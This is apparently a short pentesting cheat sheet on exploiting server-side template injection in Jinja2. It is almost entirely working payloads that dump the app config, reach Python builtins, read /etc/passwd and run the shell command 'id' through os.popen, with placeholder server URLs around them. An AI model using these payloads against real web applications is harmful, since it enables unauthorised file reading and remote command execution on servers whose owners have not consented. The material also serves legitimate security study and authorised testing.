Exploiting SSTI - Jinja2
{{ config.items() }}http://<SERVER_IP>:<PORT>/
{{ self.__init__.__globals__.__builtins__ }}
{{ self.__init__.__globals__.__builtins__.open("/etc/passwd").read() }}CodeCopy Codehttp://<SERVER_IP>:<PORT>/
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
Last updated